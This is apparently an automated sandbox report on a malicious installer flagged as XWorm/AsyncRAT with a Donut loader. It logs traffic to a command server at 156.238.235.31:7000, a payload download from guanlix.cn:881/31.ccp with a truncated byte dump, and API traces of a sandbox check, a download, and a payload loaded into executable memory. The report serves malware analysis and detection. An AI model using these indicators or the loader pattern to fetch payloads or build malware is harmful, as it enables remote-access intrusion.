Jul 2, 2024 19:23:18.400425911 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:18.408128977 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:18.412947893 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:20.789710999 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:20.794683933 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:21.105202913 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:21.107351065 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:21.112395048 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:22.867976904 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:22.872796059 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:23.023977995 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:23.028872967 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:23.117738962 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:23.123203039 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:23.183339119 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:23.186151981 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:23.192059040 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:23.402365923 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:23.404529095 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:23.409699917 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:23.759919882 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:23.770540953 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:23.775561094 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:25.684478045 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:25.870811939 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:26.076395988 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:26.076492071 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:26.305237055 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:26.310267925 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:26.621445894 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:26.626133919 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:26.630927086 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:36.399049044 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:36.403913021 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:36.713705063 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:36.715754986 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:36.721172094 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:36.883605003 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:36.888422012 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:37.258467913 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:37.263339996 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:37.299423933 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:37.301352024 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:37.349909067 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:37.573506117 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:37.575319052 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:37.580142021 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:47.352184057 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:47.358241081 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:47.667578936 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:47.670497894 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:47.676219940 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:55.662770987 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:55.711330891 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:57.445940018 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:57.453113079 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:57.765971899 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:23:57.778178930 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:23:57.783740997 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:07.539619923 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:07.544626951 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:07.941256046 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:07.950206041 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:07.955084085 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:09.602400064 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:09.607330084 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:09.617693901 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:09.623224974 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:09.633307934 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:09.638223886 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:09.648919106 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:09.653954029 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:09.696167946 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:09.701148987 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:09.923197985 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:09.930315971 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:09.935632944 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:10.140795946 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:10.146198034 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:10.151067972 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:10.361726999 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:10.363603115 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:10.369585991 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:10.369703054 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:10.374749899 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:10.374857903 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:10.379664898 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:19.789685011 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:19.794811010 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:20.104568005 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:20.106563091 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:20.111457109 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:25.670517921 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:25.711189032 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:29.883347988 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:29.888197899 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:30.205632925 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:30.207727909 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:30.212702990 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:32.274904013 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:32.279808044 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:32.590193987 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:32.592272997 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:32.597106934 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:35.133553982 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:35.138457060 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:35.449239016 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:35.451397896 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:35.459443092 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:40.883483887 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:40.888788939 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:41.198954105 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:41.201821089 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:41.207151890 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:48.166954994 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:48.171813965 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:48.483834982 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:48.488243103 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:48.493555069 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:50.558934927 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:50.563745022 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:50.909606934 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:50.911722898 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:50.916517973 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:55.688648939 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:55.742506027 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:56.525187016 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:56.532768965 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:57.054992914 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:24:57.059776068 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:24:57.064596891 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:25:04.039823055 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:25:04.044759989 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:25:04.354851961 CEST	7000	49712	156.238.235.31	192.168.2.6
Jul 2, 2024 19:25:04.355848074 CEST	49712	7000	192.168.2.6	156.238.235.31
Jul 2, 2024 19:25:04.360831022 CEST	7000	49712	156.238.235.31	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 19:20:59.353652954 CEST	61136	53	192.168.2.6	1.1.1.1
Jul 2, 2024 19:20:59.786377907 CEST	53	61136	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 2, 2024 19:20:59.353652954 CEST	192.168.2.6	1.1.1.1	0x74c	Standard query (0)	guanlix.cn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 2, 2024 19:20:59.786377907 CEST	1.1.1.1	192.168.2.6	0x74c	No error (0)	guanlix.cn		91.208.240.157	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

guanlix.cn:881

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	91.208.240.157	881	6672	C:\Users\user\Desktop\31-o_Installer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 19:20:59.798795938 CEST	93	OUT	GET /31.ccp HTTP/1.1 User-Agent: Download Host: guanlix.cn:881 Cache-Control: no-cache
Jul 2, 2024 19:21:00.729688883 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Tue, 02 Jul 2024 17:20:43 GMT Content-Type: application/octet-stream Content-Length: 71938 Last-Modified: Mon, 01 Jul 2024 01:27:00 GMT Connection: keep-alive ETag: "668205e4-11902" Accept-Ranges: bytes Data Raw: e8 88 bb 00 00 88 bb 00 00 9e 17 7a 0f 05 b6 fa 05 be ae 6c 11 f9 d0 84 84 17 2c d2 af e5 2f 7a 81 4e 8c d6 d5 78 43 0d 21 00 00 00 00 78 5c f5 47 36 fd 4b c5 c7 38 4c f2 a6 53 12 44 94 2a 71 83 2d f1 72 bd 7a 64 fc f8 d2 d9 2e f6 36 a1 db 22 09 67 88 11 60 ea 2a 2d 53 20 7d 08 87 ef 85 6d 13 9c 56 1f 71 ef 25 87 22 28 c2 75 41 87 ee 5c 0b 3b cf 17 f8 f3 d6 20 fb 7a 13 14 9d 2d 7e 38 99 31 8d 02 08 07 51 6e e7 07 db 6b 6f 27 05 76 c7 b8 f1 54 fd fa 96 e2 47 cc 6e 86 02 63 ab 0c 48 57 16 4a ce 0d 48 3f c1 9e 74 45 12 59 0e ed 7c 9c b0 c9 4f 88 52 08 9a e5 24 38 84 43 aa 56 80 39 82 17 71 99 a3 44 56 d0 70 0c 59 ac 5b 58 af 93 b3 fe e9 a1 42 a6 de 75 f2 7a be d9 29 8f 85 06 91 7e 3b e4 8e 08 f7 d5 e9 94 44 30 de 00 52 e6 ae aa 0f 0d 96 ea 40 a9 da 44 74 9d c3 28 51 01 8e 32 2c b7 7b 47 26 ac c2 c6 c4 10 b6 38 4c 4b 79 06 f6 68 70 c7 ec bd 92 f0 22 ba 46 6e 5c b3 91 78 e2 60 9d e5 10 a2 14 1a cb e5 e1 92 f5 62 04 bc b2 36 2a 9f 3d 79 99 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: zl,/zNxC!x\G6K8LSDq-rzd.6"g`-S }mVq%"(uA\; z-~81Qnko'vTGncHWJH?tEY\|OR$8CV9qDVpY[XBuz)~;D0R@Dt(Q2,{G&8LKyhp"Fn\x`b6=yB]t<bfcGlK/a;{q0RC.K\8e1.[&/$_6Y9Msc55G{#'&O8e@)meJa3kQ\KAxVp7ST$f4wzde8[COI2+3]MOEu 4MIm_'F{:^N*AgCG-;fRo,v:-DdadeN{5(4[TXE-E?KVTOFv9i&O pMl2lJdi5^J_YO\ACSB

Target ID:	0
Start time:	13:20:57
Start date:	02/07/2024
Path:	C:\Users\user\Desktop\31-o_Installer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\31-o_Installer.exe"
Imagebase:	0x260000
File size:	249'344 bytes
MD5 hash:	5913D1B0D2FA0204E9E063467D000C3A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4546753874.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4547420805.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	10.4%
Signature Coverage:	2.1%
Total number of Nodes:	792
Total number of Limit Nodes:	54

Executed Functions

Function 002625C8 Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 002625C8

Part of subcall function 0026221D: __EH_prolog.LIBCMT ref: 00262222

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6ccec3e5f62dcff7b53ef0427f6f91d8b9ef952e0cc2d517c2a72ad1e89c4f83
Instruction ID: 2c7e9c03fcb804da62e4d9e21cd0b56edb5e7c04ef737ffb3d301e471390b461
Opcode Fuzzy Hash: 6ccec3e5f62dcff7b53ef0427f6f91d8b9ef952e0cc2d517c2a72ad1e89c4f83
Instruction Fuzzy Hash: 7911BC75910259EFCF10DF98CA809AEBBB4FF08314F10804EE60267251C7719A64DFA1

Function 0533A418 Relevance: .9, Instructions: 884COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 562c828927ec00fde05e1f0ad2f0c72adeeff74f940cdeafabe3d3a222a328ab
Instruction ID: a589e8dcf8172a42924b70a922242e57389e4cb0577e2e3a057488ba7e5fa2c6
Opcode Fuzzy Hash: 562c828927ec00fde05e1f0ad2f0c72adeeff74f940cdeafabe3d3a222a328ab
Instruction Fuzzy Hash: 37725D70A002199FDB14DFA9C895AAEBBF7FF88340F148569E446EB2A1DB74DC41CB50

Function 0533EE5A Relevance: .8, Instructions: 809COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4781f5addb6cc3c9bc6736de0aa289fd53490dd2b3680e55a9018c5c1877a756
Instruction ID: 1cc636ed6c4c81150130e1c9ba3ce508f8fd10e29bbb0e5e4ce35024fae4963b
Opcode Fuzzy Hash: 4781f5addb6cc3c9bc6736de0aa289fd53490dd2b3680e55a9018c5c1877a756
Instruction Fuzzy Hash: 73529E34B402058FDB18EB75D46AB6E7BE7FF88301F108569E9069B391DF799D818B80

Function 05337CB0 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0bed1678d3db59913e512e1e547f66047c1aa7f9b1f1f63126963dc1804ccbc
Instruction ID: c9e26acf7c2ee5625e0eab234b2d98e2fefbe5383b3ffa37341cec43c52532a2
Opcode Fuzzy Hash: e0bed1678d3db59913e512e1e547f66047c1aa7f9b1f1f63126963dc1804ccbc
Instruction Fuzzy Hash: ABC18274A04209DBDF184F65C8552AEFEBBFFC8751F18485DE443A6288CF388885CB65

Function 05334E68 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4727dc38e4552ae5d80f67e388d1ccf448d65f49309a2d9e6f565ef7125f3194
Instruction ID: 4ca6451a46af6ab19c695cbf9aa3339eb79d226f25d3c60470c6e34f681e9172
Opcode Fuzzy Hash: 4727dc38e4552ae5d80f67e388d1ccf448d65f49309a2d9e6f565ef7125f3194
Instruction Fuzzy Hash: 47B16D71E002499FDF10CFA9C886BEEBBF2BF88714F148129D815A7254EB759845CF91

Function 05335B40 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80f603c622bc8a5b52dd42ebe52d7d575f4968ad03c47b6e306ca5eb427fe3cc
Instruction ID: 55bf6945940dfda2e9fe2e69acae9fffd90bec5b5a5de56ddab991c922e76d69
Opcode Fuzzy Hash: 80f603c622bc8a5b52dd42ebe52d7d575f4968ad03c47b6e306ca5eb427fe3cc
Instruction Fuzzy Hash: 28B16C71E00209CFDB14CFA9D9867EEBBF2BF88714F148529D815EB294EB749845CB81

Function 002611E1 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 89
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 002611EF
Sleep.KERNEL32(0000012C), ref: 002611F9
GetTickCount64.KERNEL32 ref: 002611FF

Part of subcall function 00264424: __vwprintf_l.LIBCMT ref: 00264432

CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.cod,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00261244
GetFileSize.KERNEL32(00000000,00000000), ref: 0026124E
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 0026125F
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00261270
CloseHandle.KERNEL32(00000000), ref: 00261277

Strings

`3#v01#v, xrefs: 0026124E
sandbox!!!, xrefs: 00261222
v4:%d, xrefs: 0026120C
C:\Users\Public\Downloads\ind.cod, xrefs: 0026123F

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: File$Count64Tick$AllocCloseCreateHandleReadSizeSleepVirtual__vwprintf_l
String ID: C:\Users\Public\Downloads\ind.cod$`3#v01#v$sandbox!!!$v4:%d
API String ID: 1694741105-649293508
Opcode ID: 8e6e975e325b1f2ea6d59b2ba1624a6668fdc605a331f2150d69c5ef31f9f246
Instruction ID: 6c99efdb40445b0018693d4cdf595e5a2a79667a8c27062a4fcc0e206651883a
Opcode Fuzzy Hash: 8e6e975e325b1f2ea6d59b2ba1624a6668fdc605a331f2150d69c5ef31f9f246
Instruction Fuzzy Hash: 1911B1736503147FE720A7F9AC4EFAB7AACEF46770F200525FA09D2190E9A05C8086B1

Function 00262E5D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00262E5D
InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00262E79
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00262E96
InternetCloseHandle.WININET(?), ref: 00262F2A

Part of subcall function 00262D2E: __EH_prolog.LIBCMT ref: 00262D33

InternetReadFile.WININET(?,?,00001000,?), ref: 00262EFC
InternetCloseHandle.WININET(?), ref: 00262F12

Strings

Download, xrefs: 00262E74

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: Internet$CloseH_prologHandleOpen$FileRead
String ID: Download
API String ID: 2208602198-2171396134
Opcode ID: ed0ec0436332dea7b094b59ae0f2b25c145ef28fd8231cbfc512236654bd34c4
Instruction ID: f1078095950a8647e8b04f179ae9d74261c2a3784c5e8810ef5d16ac3d43473e
Opcode Fuzzy Hash: ed0ec0436332dea7b094b59ae0f2b25c145ef28fd8231cbfc512236654bd34c4
Instruction Fuzzy Hash: BA211D7591161AEFDF119F90DC89FEEB778FB04354F500169B505B2190D6705EE4CE60

Function 00262E58 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00262E5D
InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00262E79
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00262E96
InternetCloseHandle.WININET(?), ref: 00262F2A

Part of subcall function 00262D2E: __EH_prolog.LIBCMT ref: 00262D33

InternetReadFile.WININET(?,?,00001000,?), ref: 00262EFC
InternetCloseHandle.WININET(?), ref: 00262F12

Strings

Download, xrefs: 00262E74

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: Internet$CloseH_prologHandleOpen$FileRead
String ID: Download
API String ID: 2208602198-2171396134
Opcode ID: f4ec57822d720943671525f8b2add85e86816b901a13266037f8145254d0a3aa
Instruction ID: 8cda7fd1d29f37ae29ef3eb4701505f56be3ad137e0f2b5771b80def5fa0b60b
Opcode Fuzzy Hash: f4ec57822d720943671525f8b2add85e86816b901a13266037f8145254d0a3aa
Instruction Fuzzy Hash: E2115E7592121AEFEF109F94DC89FEEBB78EB05354F100179B50AB61A0C6705EE8CE60

Function 02E6FFE7 Relevance: 7.6, APIs: 5, Instructions: 90
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000000,00000002,?,02E6FCB5,00000000), ref: 02E6FFF5
VirtualProtect.KERNEL32(00000000,0000000C,00000040,?,?,02E6FCB5,00000000), ref: 02E70035
VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 02E70068
VirtualProtect.KERNEL32(00000000,004014A4,00000040,?), ref: 02E70093
VirtualProtect.KERNEL32(00000000,004014A4,?,?), ref: 02E700BD

Memory Dump Source

Source File: 00000000.00000002.4546753874.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_31-o_Installer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
